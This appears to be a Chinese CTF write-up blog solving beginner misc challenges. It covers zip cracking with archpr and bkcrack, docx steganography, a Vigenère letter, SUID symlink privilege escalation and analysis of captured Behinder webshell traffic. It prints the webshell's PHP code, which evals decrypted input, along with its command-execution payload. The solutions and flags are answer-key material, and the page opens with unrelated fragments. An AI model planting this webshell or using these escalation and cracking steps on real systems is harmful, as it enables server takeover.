视频订单: 1400
4
拼手气红包: 250
5
代理: -99   （哈哈哈哈哈户子果然买代理）
6
购买力测评: -100      （好好好）
7
给亲戚红包: -500
8
工作室设备: -7500
9
未成年退款: -397715  （蛙趣）
10
总的结余是: -54552  （有点可怜）

看启动关闭时间可以这样，关注Oct 15那段就可以了

1
你好🍎人[root@arch /]# grep -i "resuming normal operations\|shutting down\|SIGHUP" /var/log/httpd/error_log
2
[Wed Oct 15 20:00:08.916728 2025] [mpm_event:notice] [pid 9589:tid 9589] AH00489: Apache/2.4.65 (Unix) configured -- resuming normal operations
3
[Wed Oct 15 22:31:11.834725 2025] [mpm_event:notice] [pid 9589:tid 9589] AH00491: caught SIGTERM, shutting down
4
[Thu Oct 16 00:59:04.270264 2025] [mpm_event:notice] [pid 489:tid 489] AH00489: Apache/2.4.65 (Unix) configured -- resuming normal operations
5
[Thu Oct 16 01:10:45.300865 2025] [mpm_event:notice] [pid 489:tid 489] AH00491: caught SIGTERM, shutting down
6
[Fri Oct 17 00:31:33.409034 2025] [mpm_event:notice] [pid 488:tid 488] AH00489: Apache/2.4.65 (Unix) configured -- resuming normal operations
7
[Fri Oct 17 00:37:51.587587 2025] [mpm_event:notice] [pid 488:tid 488] AH00491: caught SIGTERM, shutting down
8
[Fri Oct 17 00:40:02.828664 2025] [mpm_event:notice] [pid 484:tid 484] AH00489: Apache/2.4.65 (Unix) configured -- resuming normal operations
9
[Fri Oct 17 00:45:03.988453 2025] [mpm_event:notice] [pid 484:tid 484] AH00491: caught SIGTERM, shutting down

也可以用journalctl：

1
journalctl -u httpd.service --since "2025-10-15 00:00:00" --until "2025-10-17 23:59:59"

AndroidService

misc#

[Week1] 《关于我穿越到CTF的异世界这档事:序》#

1
{
2
    '?': 0,
3
    'C': 1,
4
    'F': 3,
5
    'T': 2,
6
    'c': 7,
7
    'i': 5,
8
    'm': 4,
9
    's': 6
10
}
11

12
ZmxhZ3tUaDNfUHIxbmMxcGwzXzBmX0Jhc2VfMXNfUzBfRXp6fQ==
13

14
flag{Th3_Pr1nc1pl3_0f_Base_1s_S0_Ezz}

[Week1] 俱乐部之旅(1) - 邀请函#

1
unzip -v 200302_Try_t0_f1nd_My_s3cret.zip
2
Archive:  200302_Try_t0_f1nd_My_s3cret.zip
3
c5im????
4
 Length   Method    Size  Cmpr    Date    Time   CRC-32   Name
5
--------  ------  ------- ---- ---------- ----- --------  ----
6
   12507  Defl:N    10689  15% 08-13-2025 18:02 eb7bd9a2  steg.docx
7
--------          -------  ---                            -------
8
   12507            10689  15%                            1 file

猜测**c5im????**为密码格式，archpr爆破得到密码c5im8467。解压得到一个损坏的docx，点击修复，全选复制，粘贴到别处发现：

1
Office Open XML（缩写：Open XML或OOXML），为由Microsoft开发的一种以XML为基础并以ZIP格式压缩的电子文件规范，支持文件、表格、备忘录、幻灯片等文件格式。
2

3
OOXML在2006年12月成为了ECMA规范的一部分，编号为ECMA-376；并于2008年4月通过国际标准化组织的表决，在两个月后公布为ISO／IEC 29500国际标准。微软推出这个格式，很多人认为是出于商业考量。许多专家指出，该标准并不是个完整的标准，采用了许多微软的独有规格，使用上困难重重。
4

5
从Microsoft Office 2007开始，Office Open XML文件格式已经成为Microsoft Office默认的文件格式。Microsoft Office 2010支持对ECMA-376标准文档的读操作，ISO/IEC 29500 Transitional的读/写，ISO/IEC 29500 Strict的读取。Microsoft Office 2013同时支持ISO/IEC 29500 Strict的读写操作。

那么既然提到了zip，把docx改为zip解压。查看core.xml

1
<dc:description>11001101101100110000111001111111011101011101100001110010110010010111110110101111010001100111100111101111111010011110011101111101100011111010</dc:description>
2
<cp:keywords>do u know cyberchef?</cp:keywords>
3
<cp:lastModifiedBy>炙恕qwq</cp:lastModifiedBy>
4
<dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-13T09:59:15Z</dcterms:modified>
5
<dc:title>标准ASCII码使用‌7位二进制数‌表示字符</dc:title>

得到前半部分flag{W0rd_5t3g_is_1z

查看steg/word/u_f0und_m3,得到2657656c63306d655f74305f7468335f6335696d5f433175627d，丢到cyberchef 得到后半部分**&Welc0me_t0_th3_c5im_C1ub}**

拼接得到完整flag：flag{W0rd_5t3g_is_1z&Welc0me_t0_th3_c5im_C1ub}

[Week1] 维吉尼亚朋友的来信#

你的维吉尼亚朋友向你来信，奇怪的是你却收到了一个音频，你用眼睛仔细去听，发现信件从深处的声音中来… 用deepsound打开，提取到：

1
Gieg fsq sulirs,
2
  Osfprpi xd lvy gkumpaaba jruph dx QNS!Wkmw xkb’n wxvx e vsay—vw’v e tasmaerxrh lzslr fxvmdkwnl phixh uvuyohrkt, ovyeh hzigq zcah rj gdvs, yihuc lxvrya foyi, pfr yihuc tjrnfr krphh s gypuhx apahcaj ws ft mbwbyhvis. Zslr, bry’pa khlrwfl cdmf gvqg, pipjb nb vhi tplhyeqv mr rzoif, dqh xjjb "C qrq’x ocgk" cawr "M jxyilrg lx sjl."
3
  Ria’w zsvgq wz gklrkh xsyy ryivlzsfzlqk ei xwlfw. Zi’zt szf ohhr xwwfy—fwdvmcy on n susfawa, mpudxgwaba bxu lipvg, qbqgivxfu quhui xd khuew. Eyx izon’f wki qpyww bi lx: ikwfs zlvxezw wm n ohwwdf, sprub wqpdz qvq d vyhz. Ohq bry’vt fcn norri. Izwm prpqycahs gkumztk ch propeqgfuglrr, sc kvuelqk mswom, nqg pmulwht hdgl dlvye xs.
4
  Ws sajy vq. Hbtagfy. Rasivxeshg. Dvo ujwgnvrqw. Gtdsvedwi xww hcab ymgigfcrv, drh sgb’n shdv xww gnhpepih. Lvy PWI asgdr cf eumkwlsl jlwl cdm wh vw, drh lw qua’w zemi lc mrh zligw mihu msygfss gdniw ngi.
5
Zydj mw "umbhl ohxxtj hi lrx". Vibwavru zvee lvy sodk gdfhyaw lr jasu{} uag xwi jfryeolri‘_' ig fycodgi hhowr fkevpuhye' '.
6

7
Ehwx lagbrv!

题目名称就给了提示：维吉尼亚密码。密钥是deepsound，没意识到可以问GPT，显然jasu->flag。只能说，GPT-5还是太强了。

1
Dear new friend,
2
  Welcome to the thrilling world of CTF!This isn’t just a game—it’s a playground where curiosity meets challenge, where every line of code, every hidden clue, and every puzzle holds a secret waiting to be uncovered. Here, you’ll stretch your mind, learn to see patterns in chaos, and turn "I don’t know" into "I figured it out."
3
  Don’t worry if things feel overwhelming at first. We’ve all been there—staring at a problem, scratching our heads, wondering where to start. But that’s the magic of it: every mistake is a lesson, every small win a rush. And you’re not alone. This community thrives on collaboration, on sharing ideas, and lifting each other up.
4
  So dive in. Explore. Experiment. Ask questions. Celebrate the tiny victories, and don’t fear the stumbles. The CTF world is brighter with you in it, and we can’t wait to see where your journey takes you.
5
Flag is "funny letter to you". Remember wrap the flag content in flag{} and use underline‘_' to replace space character' '.
6

7
Best wishes!

1
flag{funny_letter_to_you}

[Week2] 《关于我穿越到CTF的异世界这档事:破》#

用户：ctf，密码：CtfP@ssw0rd!2025 ok ssh连上，发现是 Ubuntu 22.04

1
ctf@cl-137-c98351f013ba2a8a:~$ ls
2
notes.txt
3
ctf@cl-137-c98351f013ba2a8a:~$ cat notes.txt
4
Think About SUID.

1
ctf@cl-137-c98351f013ba2a8a:~$ cat /start.sh
2
#!/bin/sh
3

4
if [ "$A1CTF_FLAG" ]; then
5
    INSERT_FLAG="$A1CTF_FLAG"
6
    unset A1CTF_FLAG
7
elif [ "$QUESTION_CTF_FLAG" ]; then
8
    INSERT_FLAG="$QUESTION_CTF_FLAG"
9
    unset QUESTION_CTF_FLAG
10
elif [ "$GZCTF_FLAG" ]; then
11
    INSERT_FLAG="$GZCTF_FLAG"
12
    unset GZCTF_FLAG
13
elif [ "$FLAG" ]; then
14
    INSERT_FLAG="$FLAG"
15
    unset FLAG
16
else
17
    INSERT_FLAG="QUESTION_CTF{!!!!_FLAG_ERROR_ASK_ADMIN_!!!!}"
18
fi
19

20
echo -n $INSERT_FLAG > /root/flag.txt
21
INSERT_FLAG=""
22

23
chmod 600 /root/flag.txt
24
chown root:root /root/flag.txt
25

26
exec /usr/sbin/sshd -D

那目标就是利用SUID提权到root，读取/root/flag.txt

1
ctf@cl-137-c98351f013ba2a8a:~$ find / -perm -u=s -type f 2>/dev/null
2
/usr/local/bin/editnote
3
/usr/bin/chsh
4
/usr/bin/su
5
/usr/bin/passwd
6
/usr/bin/newgrp
7
/usr/bin/mount
8
/usr/bin/gpasswd
9
/usr/bin/umount
10
/usr/bin/chfn
11
/usr/lib/openssh/ssh-keysign

显然这个/usr/local/bin/editnote就是SUID文件。

1
ctf@cl-137-c98351f013ba2a8a:~$ strings /usr/local/bin/editnote
2
/lib64/ld-linux-x86-64.so.2
3
__cxa_finalize
4
__libc_start_main
5
execlp
6
getenv
7
perror
8
libc.so.6
9
GLIBC_2.34
10
GLIBC_2.2.5
11
_ITM_deregisterTMCloneTable
12
__gmon_start__
13
_ITM_registerTMCloneTable
14
PTE1
15
u+UH
16
EDITOR
17
/home/ctf/notes.txt
18
execlp failed
19
:*3$"
20
GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0
21
Scrt1.o
22
__abi_tag
23
crtstuff.c
24
deregister_tm_clones
25
__do_global_dtors_aux
26
completed.0
27
...后续省略

关注这两个EDITOR、/home/ctf/notes.txt

1
ctf@cl-137-c98351f013ba2a8a:~$ export EDITOR=cat
2
ctf@cl-137-c98351f013ba2a8a:~$ editnote /home/ctf/notes.txt
3
Think About SUID.
4
ctf@cl-137-c98351f013ba2a8a:~$ editnote
5
Think About SUID.
6
ctf@cl-137-c98351f013ba2a8a:~$ editnote /root/flag.txt
7
Think About SUID.

看起来这个editnote并不接受输入

1
ctf@cl-137-c98351f013ba2a8a:~$ echo 'cat /root/flag.txt' > /tmp/shell
2
ctf@cl-137-c98351f013ba2a8a:~$ /usr/local/bin/editnote
3
cat: /root/flag.txt: Permission denied

布什戈么？？尝试链接符号：

1
ctf@cl-137-c98351f013ba2a8a:~$ export EDITOR=/usr/bin/cat
2
ctf@cl-137-c98351f013ba2a8a:~$ rm /home/ctf/notes.txt
3
ctf@cl-137-c98351f013ba2a8a:~$ ln -s /root/flag.txt /home/ctf/notes.txt
4
ctf@cl-137-c98351f013ba2a8a:~$ /usr/local/bin/editnote
5
flag{738215c9-0064-4c47-8634-ca561e4be87d}

好啊！复盘，直接cat permission denied应该是 有效用户ID (EUID) 和 真实用户ID (RUID) 不一致，导致权限被丢弃了。

[Week2] 俱乐部之旅(2) - 我邮件呢？？#

下载得到pcapng，导出IMF export_imf 得到Congratulations.zip，but，要密码？

1
(base) ➜  [Week2] 俱乐部之旅(2) - 我邮件呢？？ unzip -v Congratulations.zip
2
Archive:  Congratulations.zip
3
Access to the congratulatory letter requires your identity hash as the password
4
 Length   Method    Size  Cmpr    Date    Time   CRC-32   Name
5
--------  ------  ------- ---- ---------- ----- --------  ----
6
     851  Stored      851   0% 09-07-2025 18:21 46287889  Congratulations.txt
7
  639230  Stored   639230   0% 09-07-2025 18:46 776c15e2  id_card.png
8
--------          -------  ---                            -------
9
  640081           640081   0%                            2 files

注意这句，Access to the congratulatory letter requires your identity hash as the password，

QWNjZXNzIEdyYW50ZWQgqEMgV2VsY29tZSB0byBDNU Access Granted ¨C Welcome to C5IM Access Granted – Welcome to C5IM

嘶，并非如此。观察到压缩包内有id_card.png，尝试使用bkcrack对png_header进行明文攻击。（部分文件数据居然也可以诶？！）参考博文https://www.cnblogs.com/JacekYang/p/17592358.html

1
(base) ➜  [Week2] 俱乐部之旅(2) - 我邮件呢？？ bkcrack -C Congratulations.zip -c id_card.png -p png_header
2
bkcrack 1.8.0 - 2025-08-18
3
[06:53:09] Z reduction using 9 bytes of known plaintext
4
100.0 % (9 / 9)
5
[06:53:09] Attack on 736192 Z values at index 6
6
Keys: 733236fb 6652cac7 8542e0e2
7
75.7 % (557238 / 736192)
8
Found a solution. Stopping.
9
You may resume the attack with the option: --continue-attack 557238
10
[06:58:23] Keys
11
733236fb 6652cac7 8542e0e2

啊啊啊啊？？？733236fb 6652cac7 8542e0e2

bkcrack -C Congratulations.zip -c id_card.png -k 733236fb 6652cac7 8542e0e2 -d id_card.png读一下id_card.png id_card 密码有了，4458e940b799c5419ac8fbceac043ac5，unzip解压得到Congratulations.txt

1
flag{pl34s3_s4f3gu4rd_y0ur_r3c0v3r3d_c5im_d4t4}

但这里并非如此顺畅，Congratulations.zip很奇怪，内部两个文件密码不一样，Keka直接认为hash密码不正确。。。

[Week2] 布豪有黑客(二)#

获得week2.pcnpng，导出object-http ~~（这个test.jpg好可爱啊哈哈哈哈）~~

观察流量发现，先上传了一个test.jpg，然后是shell.php

观察upload.php

1
<?php
2
@error_reporting(0);
3
session_start();
4
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond
5
  $_SESSION['k']=$key;
6
  session_write_close();
7
  $post=file_get_contents("php://input");
8
  if(!extension_loaded('openssl'))
9
  {
10
    $t="base64_"."decode";
11
    $post=$t($post."");
12

13
    for($i=0;$i<strlen($post);$i++) {
14
           $post[$i] = $post[$i]^$key[$i+1&15];
15
          }
16
  }
17
  else
18
  {
19
    $post=openssl_decrypt($post, "AES128", $key);
20
  }
21
    $arr=explode('|',$post);
22
    $func=$arr[0];
23
    $params=$arr[1];
24
  class C{public function __invoke($p) {eval($p."");}}
25
    @call_user_func(new C(),$params);
26
?>

我Chao！冰蝎（Behinder）！ http://tools.bugscaner.com/cryptoaes/用这个解密AES，密码为e45e329feb5d925b

冰蝎数据流实际上是 base64 + json + aes，有工具的话一键解密应该挺方便的，但这题看起来数据流不多，那就手动操作一下吧。

shell(7).php

1
@error_reporting(0);
2

3
function getSafeStr($str){
4
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
5
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
6
    if($s0 == $str){
7
        return $s0;
8
    }else{
9
        return iconv('gbk','utf-8//IGNORE',$str);
10
    }
11
}
12
function main($cmd,$path)
13
{
14
    @set_time_limit(0);
15
    @ignore_user_abort(1);
16
    @ini_set('max_execution_time', 0);
17
    $result = array();
18
    $PadtJn = @ini_get('disable_functions');
19
    if (! empty($PadtJn)) {
20
        $PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);
21
        $PadtJn = explode(',', $PadtJn);
22
        $PadtJn = array_map('trim', $PadtJn);
23
    } else {
24
        $PadtJn = array();
25
    }
26
    $c = $cmd;
27
    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
28
        $c = $c . " 2>&1\n";
29
    }
30
    $JueQDBH = 'is_callable';
31
    $Bvce = 'in_array';
32
    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {
33
        ob_start();
34
        system($c);
35
        $kWJW = ob_get_contents();
36
        ob_end_clean();
37
    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {
38
        $handle = proc_open($c, array(
39
            array(
40
                'pipe',
41
                'r'
42
            ),
43
            array(
44
                'pipe',
45
                'w'
46
            ),
47
            array(
48
                'pipe',
49
                'w'
50
            )
51
        ), $pipes);
52
        $kWJW = NULL;
53
        while (! feof($pipes[1])) {
54
            $kWJW .= fread($pipes[1], 1024);
55
        }
56
        @proc_close($handle);
57
    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {
58
        ob_start();
59
        passthru($c);
60
        $kWJW = ob_get_contents();
61
        ob_end_clean();
62
    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {
63
        $kWJW = shell_exec($c);
64
    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {
65
        $kWJW = array();
66
        exec($c, $kWJW);
67
        $kWJW = join(chr(10), $kWJW) . chr(10);
68
    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {
69
        $fp = popen($c, 'r');
70
        $kWJW = NULL;
71
        if (is_resource($fp)) {
72
            while (! feof($fp)) {
73
                $kWJW .= fread($fp, 1024);
74
            }
75
        }
76
        @pclose($fp);
77
    } else {
78
        $kWJW = 0;
79
        $result["status"] = base64_encode("fail");
80
        $result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
81
        $key = $_SESSION['k'];
82
        echo encrypt(json_encode($result));
83
        return;
84

85
    }
86
    $result["status"] = base64_encode("success");
87
    $result["msg"] = base64_encode(getSafeStr($kWJW));
88
    echo encrypt(json_encode($result));
89
}
90

91

92
function Encrypt($data)
93
{
94
 @session_start();
95
    $key = $_SESSION['k'];
96
  if(!extension_loaded('openssl'))
97
      {
98
        for($i=0;$i<strlen($data);$i++) {
99
           $data[$i] = $data[$i]^$key[$i+1&15];
100
          }
101
      return $data;
102
      }
103
    else
104
      {
105
        return openssl_encrypt($data, "AES128", $key);
106
      }
107
}
108
$cmd="Y2QgL3hwL3d3dy93ZWVrMi91cGxvYWRzLyA7bHMgLWxh";
109
$cmd=base64_decode($cmd);
110
$path="L3hwL3d3dy93ZWVrMi91cGxvYWRzLw==";
111
$path=base64_decode($path);
112
main($cmd,$path);

cmd="cd /xp/www/week2/uploads/ ;ls -la" path="/xp/www/week2/uploads/"

响应为：

1
total 388
2
drwxr-xr-x 2 www www   4096 Sep 19 12:57 .
3
drwxr-xr-x 3 www www   4096 Sep 19 11:06 ..
4
-rw-r--r-- 1 www www    643 Sep 19 12:57 shell.php
5
-rw-r--r-- 1 www www 381805 Sep 19 12:57 test.jpg

shell(10).php

1
$cmd="Y2QgL3hwL3d3dy93ZWVrMi91cGxvYWRzLyA7dW5hbWUgLWE=";
2
$cmd=base64_decode($cmd);
3
$path="L3hwL3d3dy93ZWVrMi91cGxvYWRzLw==";
4
$path=base64_decode($path);
5
main($cmd,$path);

cmd="cd /xp/www/week2/uploads/ ;uname -a" 输出：

1
Linux c3ngh-server 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux

shell(13).php （省略细节）

1
cd /xp/www/week2/uploads/ ;whoami

1
www

shell(15).php

1
cd /xp/www/week2/uploads/ ;ps -aux

1
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
2
root           1  0.0  0.2 166296 11844 ?        Ss   09:13   0:06 /sbin/init
3
root           2  0.0  0.0      0     0 ?        S    09:13   0:00 [kthreadd]
4
root           3  0.0  0.0      0     0 ?        I<   09:13   0:00 [rcu_gp]
5
root           4  0.0  0.0      0     0 ?        I<   09:13   0:00 [rcu_par_gp]
6
root           5  0.0  0.0      0     0 ?        I<   09:13   0:00 [slub_flushwq]
7
root           6  0.0  0.0      0     0 ?        I<   09:13   0:00 [netns]
8
root           8  0.0  0.0      0     0 ?        I<   09:13   0:00 [kworker/0:0H-events_highpri]
9
root          10  0.0  0.0      0     0 ?        I<   09:13   0:00 [mm_percpu_wq]
10
root          11  0.0  0.0      0     0 ?        S    09:13   0:00 [rcu_tasks_rude_]
11
root          12  0.0  0.0      0     0 ?        S    09:13   0:00 [rcu_tasks_trace]
12
root          13  0.0  0.0      0     0 ?        S    09:13   0:01 [ksoftirqd/0]
13
root          14  0.0  0.0      0     0 ?        I    09:13   0:11 [rcu_sched]
14
root          15  0.0  0.0      0     0 ?        S    09:13   0:00 [migration/0]
15
root          16  0.0  0.0      0     0 ?        S    09:13   0:00 [idle_inject/0]
16
root          18  0.0  0.0      0     0 ?        S    09:13   0:00 [cpuhp/0]
17
root          19  0.0  0.0      0     0 ?        S    09:13   0:00 [cpuhp/1]
18
root          20  0.0  0.0      0     0 ?        S    09:13   0:00 [idle_inject/1]
19
root          21  0.0  0.0      0     0 ?        S    09:13   0:01 [migration/1]
20
root          22  0.0  0.0      0     0 ?        S    09:13   0:01 [ksoftirqd/1]
21
root          24  0.0  0.0      0     0 ?        I<   09:13   0:00 [kworker/1:0H-events_highpri]
22
root          25  0.0  0.0      0     0 ?        S    09:13   0:00 [kdevtmpfs]
23
root          26  0.0  0.0      0     0 ?        I<   09:13   0:00 [inet_frag_wq]
24
root          27  0.0  0.0      0     0 ?        S    09:13   0:00 [kauditd]
25
root          29  0.0  0.0      0     0 ?        S    09:13   0:00 [khungtaskd]
26
root          30  0.0  0.0      0     0 ?        S    09:13   0:00 [oom_reaper]
27
root          31  0.0  0.0      0     0 ?        I<   09:13   0:00 [writeback]
28
root          32  0.0  0.0      0     0 ?        S    09:13   0:02 [kcompactd0]
29
root          33  0.0  0.0      0     0 ?        SN   09:13   0:00 [ksmd]
30
root          34  0.0  0.0      0     0 ?        SN   09:13   0:00 [khugepaged]
31
root          81  0.0  0.0      0     0 ?        I<   09:13   0:00 [kintegrityd]
32
root          82  0.0  0.0      0     0 ?        I<   09:13   0:00 [kblockd]
33
root          83  0.0  0.0      0     0 ?        I<   09:13   0:00 [blkcg_punt_bio]
34
root          85  0.0  0.0      0     0 ?        I<   09:13   0:00 [tpm_dev_wq]
35
root          86  0.0  0.0      0     0 ?        I<   09:13   0:00 [ata_sff]
36
root          87  0.0  0.0      0     0 ?        I<   09:13   0:00 [md]
37
root          88  0.0  0.0      0     0 ?        I<   09:13   0:00 [edac-poller]
38
root          89  0.0  0.0      0     0 ?        I<   09:13   0:00 [devfreq_wq]
39
root          90  0.0  0.0      0     0 ?        S    09:13   0:00 [watchdogd]
40
root          91  0.0  0.0      0     0 ?        I<   09:13   0:00 [kworker/1:1H-kblockd]
41
root          93  0.0  0.0      0     0 ?        S    09:13   0:00 [kswapd0]
42
root          94  0.0  0.0      0     0 ?        S    09:13   0:00 [ecryptfs-kthrea]
43
root          96  0.0  0.0      0     0 ?        I<   09:13   0:00 [kthrotld]
44
root          97  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/24-pciehp]
45
root          98  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/25-pciehp]
46
root          99  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/26-pciehp]
47
root         100  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/27-pciehp]
48
root         101  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/28-pciehp]
49
root         102  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/29-pciehp]
50
root         103  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/30-pciehp]
51
root         104  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/31-pciehp]
52
root         105  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/32-pciehp]
53
root         106  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/33-pciehp]
54
root         107  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/34-pciehp]
55
root         108  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/35-pciehp]
56
root         109  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/36-pciehp]
57
root         110  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/37-pciehp]
58
root         111  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/38-pciehp]
59
root         112  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/39-pciehp]
60
root         113  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/40-pciehp]
61
root         114  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/41-pciehp]
62
root         115  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/42-pciehp]
63
root         116  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/43-pciehp]
64
root         117  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/44-pciehp]
65
root         118  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/45-pciehp]
66
root         119  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/46-pciehp]
67
root         120  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/47-pciehp]
68
root         121  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/48-pciehp]
69
root         122  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/49-pciehp]
70
root         123  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/50-pciehp]
71
root         124  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/51-pciehp]
72
root         125  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/52-pciehp]
73
root         126  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/53-pciehp]
74
root         127  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/54-pciehp]
75
root         128  0.0  0.0      0     0 ?        S    09:13   0:00 [irq/55-pciehp]
76
root         129  0.0  0.0      0     0 ?        I<   09:13   0:00 [acpi_thermal_pm]
77
root         131  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_0]
78
root         132  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_0]
79
root         133  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_1]
80
root         134  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_1]
81
root         136  0.0  0.0      0     0 ?        I<   09:13   0:00 [vfio-irqfd-clea]
82
root         137  0.0  0.0      0     0 ?        I<   09:13   0:00 [mld]
83
root         138  0.0  0.0      0     0 ?        I<   09:13   0:00 [ipv6_addrconf]
84
root         149  0.0  0.0      0     0 ?        I<   09:13   0:00 [kstrp]
85
root         152  0.0  0.0      0     0 ?        I<   09:13   0:00 [zswap-shrink]
86
root         154  0.0  0.0      0     0 ?        I<   09:13   0:00 [kworker/u257:0]
87
root         159  0.0  0.0      0     0 ?        I<   09:13   0:00 [charger_manager]
88
root         182  0.0  0.0      0     0 ?        I<   09:13   0:00 [kworker/0:1H-kblockd]
89
root         205  0.0  0.0      0     0 ?        I<   09:13   0:00 [mpt_poll_0]
90
root         206  0.0  0.0      0     0 ?        I<   09:13   0:00 [mpt/0]
91
root         207  0.0  0.0      0     0 ?        I<   09:13   0:00 [ttm_swap]
92
root         208  0.0  0.0      0     0 ?        S    09:13   0:01 [irq/16-vmwgfx]
93
root         209  0.0  0.0      0     0 ?        S    09:13   0:00 [card0-crtc0]
94
root         210  0.0  0.0      0     0 ?        S    09:13   0:00 [card0-crtc1]
95
root         211  0.0  0.0      0     0 ?        S    09:13   0:00 [card0-crtc2]
96
root         212  0.0  0.0      0     0 ?        S    09:13   0:00 [card0-crtc3]
97
root         213  0.0  0.0      0     0 ?        S    09:13   0:00 [card0-crtc4]
98
root         214  0.0  0.0      0     0 ?        S    09:13   0:00 [card0-crtc5]
99
root         215  0.0  0.0      0     0 ?        S    09:13   0:00 [card0-crtc6]
100
root         216  0.0  0.0      0     0 ?        S    09:13   0:00 [card0-crtc7]
101
root         217  0.0  0.0      0     0 ?        I<   09:13   0:00 [cryptd]
102
root         266  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_2]
103
root         267  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_2]
104
root         268  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_3]
105
root         269  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_3]
106
root         270  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_4]
107
root         271  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_4]
108
root         272  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_5]
109
root         273  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_5]
110
root         274  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_6]
111
root         275  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_6]
112
root         276  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_7]
113
root         277  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_7]
114
root         278  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_8]
115
root         279  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_8]
116
root         280  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_9]
117
root         281  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_9]
118
root         282  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_10]
119
root         283  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_10]
120
root         284  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_11]
121
root         285  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_11]
122
root         286  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_12]
123
root         287  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_12]
124
root         288  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_13]
125
root         289  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_13]
126
root         290  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_14]
127
root         291  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_14]
128
root         292  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_15]
129
root         293  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_15]
130
root         294  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_16]
131
root         295  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_16]
132
root         296  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_17]
133
root         297  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_17]
134
root         298  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_18]
135
root         299  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_18]
136
root         300  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_19]
137
root         301  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_19]
138
root         302  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_20]
139
root         303  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_20]
